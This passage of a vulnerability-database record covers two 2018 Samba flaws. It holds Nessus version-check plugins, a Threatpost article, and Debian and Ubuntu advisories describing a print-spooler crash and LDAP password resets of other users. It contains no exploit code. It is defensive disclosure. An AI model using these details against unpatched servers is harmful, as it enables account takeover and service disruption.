(deb_check(release:\"9.0\", prefix:\"libpam-winbind\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libparse-pidl-perl\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libsmbclient\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libsmbclient-dev\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libwbclient-dev\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libwbclient0\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"python-samba\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"registry-tools\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-common\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-common-bin\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-dev\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-dsdb-modules\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-libs\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-testsuite\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"samba-vfs-modules\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"smbclient\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"winbind\", reference:\"2:4.5.12+dfsg-2+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:40:10", "bulletinFamily": "scanner", "description": "The samba project reports :\n\nMissing NULL pointer checks may crash the external print server\nprocess.\n\nOn a Samba 4 AD DC any authenticated user can change other user", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_FB26F78A26A911E8A1C200505689D4AE.NASL", "href": "https://www.tenable.com/plugins/nessus/108316", "published": "2018-03-14T00:00:00", "title": "FreeBSD : samba -- multiple vulnerabilities (fb26f78a-26a9-11e8-a1c2-00505689d4ae)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108316);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:47\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n\n script_name(english:\"FreeBSD : samba -- multiple vulnerabilities (fb26f78a-26a9-11e8-a1c2-00505689d4ae)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The samba project reports :\n\nMissing NULL pointer checks may crash the external print server\nprocess.\n\nOn a Samba 4 AD DC any authenticated user can change other user's\npasswords over LDAP, including the passwords of administrative users\nand service accounts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\"\n );\n # https://vuxml.freebsd.org/freebsd/fb26f78a-26a9-11e8-a1c2-00505689d4ae.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a566c41f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba44\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba45\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba46\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba47\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba44<4.4.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba45<4.5.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba46<4.6.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba47<4.7.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:38", "bulletinFamily": "info", "description": "Two critical patches for the free networking software Samba were released Tuesday, addressing vulnerabilities that could allow an unprivileged remote attacker to launch a denial of service attack against servers running the software or allow an adversary to change user passwords, including the admin\u2019s.\n\nSamba, a popular free open source software, allows Windows-based file and print services to be shared via operating systems such as Windows, Linux and UNIX.\n\nThe vulnerability [CVE-2018-1050](<https://www.samba.org/samba/security/CVE-2018-1050.html>) enables hackers to launch denial of service attacks on external print servers, according to the [Samba security release posted Tuesday](<https://www.samba.org/samba/history/security.html>).\n\nAccording to Samba, CVE-2018-1050 has impacted all versions of Samba from 4.0.0 and above, and stems from missing null pointer checks that may crash the external print server process.\n\nThe impacted software versions are vulnerable when the Remote Procedure Call (RPC) Microsoft Spool Subsystem service (spools) is configured to run as an external daemon program, which runs continuously to handle periodic service requests for systems.\n\nRPC is a model for programming in a distributed computing environment, which provides transparent communication so that the client appears to be communicating directly with the server. Typically, spoolss uses RPC as its transport protocol.\n\nBut due to missing input sanitization checks on some input parameters for spoolss RPC calls, when the service is run as an external daemon it could cause the background print spooler program to crash, said Samba \u2013 which impacts the handling the transfer of print files in a printer.\n\n\u201cThere is no known vulnerability associated with this error, merely a denial of service. If the RPC spoolss service is left by default as an internal service, all a client can do is crash its own authenticated connection,\u201d said Samba.\n\nSamba has released a [patch](<http://www.samba.org/samba/security/>) addressing this issue in versions 4.7.6, 4.6.14 and 4.5.16. The vulnerability was first discovered by Synopsys\u2019 Defensics intelligent fuzz testing tool, according to Samba.\n\nMeanwhile, the password vulnerability ([CVE-2018-1057](<https://www.samba.org/samba/security/CVE-2018-1057.html>)) exists on all versions of Samba from 4.0.0 and above. The vulnerability, allows authenticated users to change other users\u2019 passwords.\n\nThis vulnerability incorrectly validates permissions, allowing users to change other users\u2019 passwords \u2013 including the passwords of administrative users and privileged service accounts \u2013 over the Lightweight Directory Access Protocol (LDAP) server on a Samba 4 Samba Active Directory domain controller.\n\nLDAP is a directory service protocol that runs on a layer above the TCP/IP stack, providing a mechanism used to connect to, search and modify internet directories.\n\n\u201cThe LDAP server incorrectly validates certain LDAP password modifications against the \u2018Change Password\u2019 privilege, but then performs a password reset operation,\u201d according to Samba\u2019s release. \u201cThe change password right in AD is an extended object access right with the GUID ab721a53-1e2f-11d0-9819-00aa0040529b.\u201d\n\nAccording to Samba, this vulnerability only impacts the Samba AD domain controller, not the read-only domain controller or the Samba3/NT4-like/classic domain controller.\n\nSecurity researcher Bj\u00f6rn Baumbach, with SerNet, is credited for discovering the CVE-2018-1057.\n\nSamba said that while organizations prepare the update for this vulnerability, they can monitor their directory by keeping watch on attributes pwdLastSet and msDS-KeyVersionNumber, which will change if a password has been reset.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/03/13105256/samba.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/03/13105256/samba.png>)\n\nSamba has grappled with an array of vulnerabilities over the past 12 months, including two SMB-related man-in-the-middle bugs enabling attacks to hijack client connections in [September](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>), and a vulnerability in [May](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>) that can be exploited with one line of code and could make way for a \u201cwormable\u201d exploit that spreads quickly.\n", "modified": "2018-03-13T12:56:17", "published": "2018-03-13T12:56:17", "id": "THREATPOST:D76F21DEC2B85956DB1AD5200B4FD592", "href": "https://threatpost.com/samba-patches-two-critical-vulnerabilities-in-server-software/130383/", "type": "threatpost", "title": "Samba Patches Two Critical Vulnerabilities in Server Software", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:23:05", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4135-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 13, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nCVE ID : CVE-2018-1050 CVE-2018-1057\n\nSeveral vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-1050\n\n It was discovered that Samba is prone to a denial of service\n attack when the RPC spoolss service is configured to be run as an\n external daemon.\n\n https://www.samba.org/samba/security/CVE-2018-1050.html\n\nCVE-2018-1057\n\n Bjoern Baumbach from Sernet discovered that on Samba 4 AD DC the\n LDAP server incorrectly validates permissions to modify passwords\n over LDAP allowing authenticated users to change any other users\n passwords, including administrative users.\n\n https://www.samba.org/samba/security/CVE-2018-1057.html\nhttps://wiki.samba.org/index.php/CVE-2018-1057\n\nFor the oldstable distribution (jessie), CVE-2018-1050 will be addressed\nin a later update. Unfortunately the changes required to fix\nCVE-2018-1057 for Debian oldstable are too invasive to be backported.\nUsers using Samba as an AD-compatible domain controller are encouraged\nto apply the workaround described in the Samba wiki and upgrade to\nDebian stretch.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2:4.5.12+dfsg-2+deb9u2.\n\nWe recommend that you upgrade your samba packages.\n\nFor the detailed security status of samba please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/samba\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-03-13T09:50:11", "published": "2018-03-13T09:50:11", "id": "DEBIAN:DSA-4135-1:EA2D3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00061.html", "title": "[SECURITY] [DSA 4135-1] samba security update", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:32", "bulletinFamily": "unix", "description": "Bj\u00f6rn Baumbach discovered that Samba incorrectly validated permissions when changing account passwords via LDAP. An authenticated attacker could use this issue to change the password of other users, including administrators, and perform actions as those users. (CVE-2018-1057)\n\nIt was discovered that Samba incorrectly validated inputs to the RPC spoolss service. An authenticated attacker could use this issue to cause the service to crash, resulting in a denial of service. (CVE-2018-1050)", "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "id": "USN-3595-1", "href": "https://usn.ubuntu.com/3595-1/", "title": "Samba vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}